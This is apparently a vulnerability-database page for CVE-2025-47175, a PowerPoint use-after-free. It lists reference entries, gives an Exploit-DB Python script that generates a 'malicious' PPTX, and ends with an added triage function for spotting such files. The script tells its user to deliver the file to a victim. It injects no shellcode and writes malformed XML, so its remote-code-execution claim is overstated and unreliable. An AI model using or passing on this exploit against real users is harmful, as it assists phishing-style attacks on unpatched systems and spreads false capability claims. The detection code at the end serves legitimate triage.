| Title | Published | Views | Family |
|---|---|---|---|
| Exploit for Use After Free in Microsoft | 2 Jul 2025 12:17 | – | githubexploit |
| CVE-2025-47175 | 10 Jun 2025 15:24 | – | circl |
| Microsoft Office PowerPoint Resource Management Error Vulnerability | 10 Jun 2025 00:00 | – | cnnvd |
| Microsoft PowerPoint Code Execution Vulnerability (CNVD-2025-16692) | 13 Jun 2025 00:00 | – | cnvd |
| CVE-2025-47175 | 10 Jun 2025 17:02 | – | cve |
| CVE-2025-47175 Microsoft PowerPoint Remote Code Execution Vulnerability | 10 Jun 2025 17:02 | – | cvelist |
| Microsoft PowerPoint 2019 - Remote Code Execution (RCE) | 8 Jul 2025 00:00 | – | exploitdb |
| EUVD-2025-17724 | 3 Oct 2025 20:07 | – | euvd |
| Description of the security update for PowerPoint 2016: June 10, 2025 (KB5002689) | 10 Jun 2025 07:00 | – | mskb |
| KLA84759 Multiple vulnerabilities in Microsoft Office | 10 Jun 2025 00:00 | – | kaspersky |

```python
#!/usr/bin/env python3
# Exploit Title: Microsoft PowerPoint 2019 - Remote Code Execution (RCE)
# Author: Mohammed Idrees Banyamer
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Date: 2025-07-02
# Tested on: Microsoft PowerPoint 2019 / Office 365 (version before June 2025 Patch)
# CVE: CVE-2025-47175
# Type: Use-After-Free (UAF) Remote Code Execution (local user required)
# Platform: Windows (PowerPoint)
# Author Country: Jordan
# Attack Vector: Local (User must open crafted PPTX file)
# Description:
#   This exploit leverages a Use-After-Free vulnerability in Microsoft PowerPoint
#   allowing an attacker to execute arbitrary code by tricking a user into opening
#   a specially crafted PPTX file. This PoC generates such a malicious PPTX file
#   designed to trigger the UAF condition.
#
# Steps of exploitation:
#   1. Run this script to generate the malicious PPTX file.
#   2. Send or trick the target user to open this file in a vulnerable PowerPoint version.
#   3. Exploit triggers upon opening the file, leading to possible code execution.
#
# Note: This PoC creates a simplified PPTX file structure with crafted XML designed
#   to trigger the vulnerability. For a full exploit, further memory manipulation and shellcode injection
#   are required (not included here).
#
# Affected Versions:
#   Microsoft PowerPoint versions prior to June 2025 patch (KB5002689)
#
# Usage:
#   python3 exploit_cve2025_47175.py [options]
#
# Options:
#   -o, --output   Output PPTX filename (default: exploit_cve_2025_47175.pptx)
#   -i, --id       Shape ID (default: 1234)
#   -n, --name     Shape Name (default: MaliciousShape)
#   -t, --text     Trigger text inside the slide (default: explanation message)
#
# Example:
#   python3 exploit_cve2025_47175.py -o evil.pptx -i 5678 -n "BadShape" -t "Triggering CVE-2025-47175 now!"

import zipfile
import sys
import argparse


def create_exploit_pptx(filename, shape_id, shape_name, trigger_text):
    slide_xml = f'''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"
xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
<p:cSld>
<p:spTree>
<p:sp>
<p:nvSpPr>
<p:cNvPr id="{shape_id}" name="{shape_name}"/>
<p:cNvSpPr/>
<p:nvPr/>
</p:nvSpPr>
<p:spPr/>
<p:txBody>
<a:bodyPr/>
<a:lstStyle/>
<a:p>
<a:r>
<a:t>{trigger_text}</a:t>
</a:r>
</a:p>
</p:txBody>
</p:sp>
</p:spTree>
</p:cSld>
</p:sld>'''
    try:
        with zipfile.ZipFile(filename, 'w') as z:
            z.writestr('[Content_Types].xml',
                       '''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
<Default Extension="xml" ContentType="application/xml"/>
<Override PartName="/ppt/slides/slide1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
</Types>''')
            z.writestr('ppt/_rels/presentation.xml.rels',
                       '''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide1.xml"/>
</Relationships>''')
            z.writestr('ppt/presentation.xml',
                       '''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<p:presentation xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"
xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
<p:sldIdLst>
<p:sldId id="256" r:id="rId1"/>
</p:sldIdLst>
<p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
</p:presentation>''')
            z.writestr('ppt/slides/slide1.xml', slide_xml)
        print(f"[+] Malicious PPTX file '{filename}' created successfully.")
        print("[*] Deliver this file to the victim and wait for them to open it in vulnerable PowerPoint.")
    except Exception as e:
        print(f"[-] Error: {e}", file=sys.stderr)
        sys.exit(1)


def main():
    parser = argparse.ArgumentParser(description='Exploit generator for CVE-2025-47175 (PowerPoint UAF)')
    parser.add_argument('-o', '--output', type=str, default='exploit_cve_2025_47175.pptx',
                        help='Output PPTX filename (default: exploit_cve_2025_47175.pptx)')
    parser.add_argument('-i', '--id', type=int, default=1234,
                        help='Shape ID (default: 1234)')
    parser.add_argument('-n', '--name', type=str, default='MaliciousShape',
                        help='Shape Name (default: MaliciousShape)')
    parser.add_argument('-t', '--text', type=str, default='This content triggers CVE-2025-47175 UAF vulnerability.',
                        help='Trigger text inside the slide (default: explanation message)')
    args = parser.parse_args()
    create_exploit_pptx(args.output, args.id, args.name, args.text)


if __name__ == "__main__":
    main()
```
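
For triage of inbound attachments, the following added example (not part of the original listing or the author's code) checks a PPTX for the structural traits visible in the generator above: exactly four parts, no `_rels/.rels`, and `r:id` used in `ppt/presentation.xml` without a bound `r` prefix. The finding labels and the `build_sample` helper are constructed for this illustration.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# Parts written by the generator on this page (taken from its writestr calls).
POC_PARTS = {
    "[Content_Types].xml",
    "ppt/_rels/presentation.xml.rels",
    "ppt/presentation.xml",
    "ppt/slides/slide1.xml",
}

def triage_pptx(data: bytes) -> list[str]:
    """Return structural findings for a PPTX supplied as raw bytes."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return ["not-a-zip"]
    findings = []
    with zf:
        names = set(zf.namelist())
        if "_rels/.rels" not in names:      # OPC root relationships part
            findings.append("missing-root-rels")
        if names == POC_PARTS:
            findings.append("part-set-matches-poc-generator")
        for name in sorted(n for n in names if n.endswith((".xml", ".rels"))):
            try:
                ET.fromstring(zf.read(name))  # unbound prefixes raise ParseError
            except ET.ParseError:
                findings.append(f"xml-not-well-formed:{name}")
    return findings

def build_sample(bind_r: bool, root_rels: bool) -> bytes:
    """Constructed sample package (not a real deck) to exercise triage_pptx."""
    ns_r = (' xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"'
            if bind_r else "")
    pres = ('<p:presentation xmlns:p="http://schemas.openxmlformats.org/'
            f'presentationml/2006/main"{ns_r}><p:sldIdLst>'
            '<p:sldId id="256" r:id="rId1"/></p:sldIdLst></p:presentation>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("ppt/_rels/presentation.xml.rels", "<Relationships/>")
        z.writestr("ppt/presentation.xml", pres)
        z.writestr("ppt/slides/slide1.xml", "<sld/>")
        if root_rels:
            z.writestr("_rels/.rels", "<Relationships/>")
    return buf.getvalue()
```

The findings describe package structure only; patch status against KB5002689 still has to be confirmed on the endpoint.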